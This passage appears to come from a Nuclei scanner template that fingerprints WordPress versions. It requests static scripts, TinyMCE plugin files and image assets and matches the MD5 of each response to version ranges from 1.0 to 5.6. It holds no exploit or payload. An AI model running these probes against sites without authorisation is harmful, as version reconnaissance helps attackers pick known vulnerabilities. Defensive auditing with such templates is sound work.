dsl: + - "(\"02c9c94b41a1e8638cbca074f88626f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-a11y.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.2 + dsl: + - "(\"7fb5f1a0757b4fc79ac7c5b1920e0f8e\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"fadd746cdddaafb9978cbab2e4e4580f\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"860cbbecce6b0a5fcbb0c0faa956011a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7fc4397387256fc4d513baf001563c34\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5101bab08ad453ef4ef7313918074a14\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-a11y.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"06817ec8f4ac54ab29fbd71a8c3d1439\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"201a720227378280081f67809d781ab2\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"807223bbf40755fb69e7a55413c63a4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9496a3e87aed4ca075c24a6710fadd6b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"711c49a2ed00535aa8aa3fc7af0a2420\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"e1833e40af087af9c866a143327930cf\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"cd187287656f5a29a85e557f572f3edc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-sanitize.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c82ddb34090cba66aff7d12291e75f21\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"60dfe49df8846db04ec663ab443f9779\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.6 + dsl: + - "(\"be9dc83a6b99eaf3458b743651d01b99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - 
"(\"fc31bb3d75b7635ca8249600a9884236\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"dce840159a3f860c4ff689aa2cd11428\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"f197cd93b28210923e3590c4438eb896\" == md5(body))" + - type: dsl + name: 4.1 - 4.4.24 + dsl: + - "(\"d810b096023695b38bf682f20774af98\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"15d11156e6d93cd993e75971fb61712c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ee5f5ccfd4888467dd6416394b03f9d0\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"0ff73636f81476df81569e7ea7877b00\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.2 + dsl: + - "(\"5ef8706c50672b8945100bf3bba5ecc6\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"c221f3fd3ce085bb175deabbd1720788\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/link/plugin.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"a52a04f149c6e052aeb22456a611480c\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.2 + dsl: + - "(\"da71d62b165ecde69d1b7afb554ebb79\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"b0f6565c1b120a5dcce1014bfb7327a0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"64b892be1df127fa6a45d6b47c0a3555\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"6a5d784c2ac2ce5f64e0968c35492f03\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"0001917ebec06ecb3fbf863f38f4af52\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f26aeec9641346d082e288224578f806\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"105456f4e72329e3be147bf4fabf12b7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4370bc17007bd940b24ba43a1e07a9d0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: 
+ - "(\"8b7d4426c90a3e383fdc90fe93eb317f\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"24aff27983cef631454c00e6c77ac213\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"1f951b112676690e39c4ae9463769a8b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"c6f58718992eea8c2d40b6220ab9e21d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"a699cf8ec50c40ef2f404dfc6df34ed9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/link/plugin.js" + matchers: + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"39bd1f3127ddd31725a07ebc87c4b858\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"8abb2c35fcbf0e1a3819704181a46f44\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"fbf53969b19e593f224ffab41eeaf4fb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"7ca5d1131a7b8743f4687078bf038a89\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"f82a4e04c8926d51b90680aecc07b9c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/categories.min.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"048d156901f50fbe55169e2fa4b1c396\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/categories.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"6fc0b70ea1595374c54e9d51aad4aa7f\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"048d156901f50fbe55169e2fa4b1c396\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"80b80ef0cb2360338c6e4668829ad013\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1227fa15e7578a3763e8a23eb2a376c2\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"21bb0d381c89ce4a10a10d02e32cf0f6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"27370aa117d13ca66a89b852bf80ac29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-fields.js" + matchers: + - 
type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"87be866a7cdc94d840e6ed570c01efdd\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"4aeed8cd81abc96d27e7a6925d758ee2\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"14698a9d69a9256b8b63e1552dc85f06\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"29b80d93f3d1b24bd5529c23acd1719a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"5b555632a4efda6f8419e1bff3e35cd9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-fields.min.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4aeed8cd81abc96d27e7a6925d758ee2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/Thumbs.db" + matchers: + - type: dsl + name: 1.0.1-miles - 1.0.2 + dsl: + - "(\"c7aba2c49bbb10b312042ffdf586c765\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/menu.txt" + matchers: + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"702312cb8ae561fa80b59be708ef6cd2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-2.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"de5cf34823da2cfed273b9c8cf52248a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/star.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"888920359f8931eb72582d0c352722ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-3.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"a5b70a894f90cf8574284b7296f7661c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-9.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"4eda31d251821e5d6e5ed9cad411434f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-0.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"745de19d2c08e95dfa07113d16d77ace\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-6.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"7320c171d53bc359b0cd7ae1b53774d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-7.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"a8cbf1fe3a498f4a20abd6768a46de7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-8.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"c5cb7ee14792e1658bc0663014d37f65\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-4.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"aa064cadd0f43c0352607dad68bc5af2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-1.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"bdc9ea72a16082ff4d0ac730f090e0d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/tick.png" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"9a0f4a15dd2be4db7bbcea535764158c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-5.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"42698681e4d8734c2932c2415b94b713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/wp-favicon.png" + matchers: + - type: dsl + name: 1.2-delta - 1.2.2 + dsl: + - "(\"918e3fd1705aedabf581fe9ec02aaaf1\" == md5(body))" + - type: dsl + name: 1.0.1-miles - 1.2.1 + dsl: + - "(\"b8e308c594171cb691807867733648a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/xml.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"e67c90a18c89f8d05125c045b2978dcf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/wp-small.png" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"2e6a6066f3baa2d9f633350759ccf14c\" == md5(body))" + - method: 
GET + path: + - "{{BaseURL}}/wp-images/get-firefox.png" + matchers: + - type: dsl + name: 1.5.1 - 1.5.2 + dsl: + - "(\"93e1d3f3524f4fc80491af0b77b12383\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/header-shadow.png" + matchers: + - type: dsl + name: 1.2-delta - 1.5.2 + dsl: + - "(\"3311f3d78a8001132cd15149441f8711\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"4a1ecae7bc70f3ee911fc29e98ca0dab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/fade-butt.png" + matchers: + - type: dsl + name: 1.2-delta - 1.5.2 + dsl: + - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/wpminilogo.png" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"2f58b9a016e6da1012819decfc6dd331\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_question.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_neutral.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_sad.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_biggrin.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_surprised.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_wink.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_cool.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_confused.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_redface.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_cry.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_smile.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_evil.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_mrgreen.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_idea.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_razz.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_lol.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-images/smilies/icon_rolleyes.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_exclaim.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_mad.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_twisted.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_arrow.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_eek.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dbx-key.js" + matchers: + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a59a1ff8f5f9e0539aa2ed4fa55ef786\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/list-manipulation.js" + matchers: + - type: dsl + name: 2.0.4 - 2.0.11 + dsl: + - "(\"cfe80cd05aabaaad96cf79c6239a3e40\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.1 + dsl: + - "(\"3c6adf4762efcaae44a38e58546b0ede\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/license.html" + matchers: + - type: dsl + name: 2.0 - 2.2.3 + dsl: + - "(\"46c1f90a66583219a5f60451a3f3244e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/install.css" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"234fed47c9eef92ca35985d459a99dbf\" == md5(body))" + - method: GET + path: + 
- "{{BaseURL}}/wp-admin/dbx-admin-key.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"9301b8c88339ada63969bf9c7592c805\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/edit-comments.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"8b98dc81013e5510adde5c9280c410b6\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"c760347780287cbf8cf9baeb4c414c69\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/categories.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"27370aa117d13ca66a89b852bf80ac29\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"feedd6ae867a53792e962dc8dbf4e24c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/upload.css" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"b3503aa6a8fd1fe0996951232aedfd58\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"4d0c00b676ecb011dfdc74f8ceccf94b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/cat.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"c3ed1d4a7f90e5fc6c067e3565909868\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/users.js" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"ef8872688bcab72a712e681b5bdd0c36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/upload.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"12d5041ec2286e75628d255c6bdca9b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/upload-rtl.css" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"6ac6023d409ec51409d67d7ee6b5a1b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/xfn.js" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"c77c9e9a636feadfd1b2d7c07e2f2ba9\" == md5(body))" + - type: dsl + name: 2.0.1 - 2.0.11 + dsl: + - "(\"1725d155e16823dc41c38aa8ba286e4f\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/custom-fields.js" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"5b555632a4efda6f8419e1bff3e35cd9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/WpComments.png" + matchers: + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"f12204bb737213d9c0b530b918da182d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/WpWatermark.png" + matchers: + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"c5a6a59365ad54aa20c71e79da9dfd7a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/WpIcon.png" + matchers: + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"e44d22b74f7ee4435e22062d5adf4a6a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/list-manipulation.js" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"4e420736ce40b9b74fa4c33a542a1554\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dbx.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"33c7eab1039d3730275aa1006a4dbfaa\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"40a9779c3c1c85fa6c809f73e63aa2da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/fat.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c6f7565dd1534de02ff7abc431afb042\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a21e15fafb4f7e5a8d63da28629e7372\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/about.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"e2797544e2ff9d93619115c814cb499b\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"0d8231212de38ac33fc0acc47640532c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/charmap.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"f2be81dcf588ab0c63f38c8e784f5b92\" == md5(body))" + - type: 
dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a7adfd8471aa61e073761c6e493fc888\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/color_picker.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"daa32e73b70e34bf35af84c88dd66202\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"1060329ab7d7e40013624a3870a45bc5\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"1cdc347fadca8d396fc114e473c8c8ee\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"0ff9bfe2714875340d9e59fd53c6a379\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/source_editor.js" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"7c1b8f3d2d9f49bc3bfb82f39365825f\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"614a9bef1a1ea2320ded644ee554452a\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"aa0bf6f829e3f5aba187180e5b4a562d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/image.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"84624af8d91ef4844b2a0c63a189e126\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"274835b88f02a287ea8c3c8037536e53\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/link.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"43375669c230d406aaf97e02ebb11ce5\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"e2d602453cfdf9a25eb486a601119a20\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"dfe1b584400bd3a2d34c3d631fcbd7f0\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"8d6af59e826a2f12743af96a883b64da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/anchor.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - 
"(\"4fb4a4ac51be664a0dbb5ef2cdb15d7c\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"6e13f946344844a532a8b5b06af27bba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/newdocument.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"24b01aa27845c551f24a186a92cbc94e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/charmap.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"948c608cfe393168642e3946097eba3d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/left.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7e1153a270935427f7b61c7b6c21ab8a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyright.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"94fafae0c4b30d01d034a54376acdac3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_col_before.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d5910a210405a8cc7a24086104b06fa1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_fr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"8fbda35d5ebfc1474f93f808953b1386\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_tw.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c87ed929e41850e9614753da98827272\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d4eac7372d4d546db5110407596720dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_tw.gif" + matchers: + - type: dsl + name: 
2.1 - 2.3.3 + dsl: + - "(\"6384b264f47452af481f36e1aa689bd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_es.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"61553fb992530dbbbad211eddcc66eb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bullist.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"f360470402affab13062de5ffbfb7f74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/numlist.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d4c72d6e6d56fee2315ad59426a99a4e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cancel_button_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"23ba9eb7eb91efec2014bbf0ecb7422b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cleanup.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"96382d6d24bb8a1b228586b323e72fb4\" == md5(body))" + - method: GET + path: + - 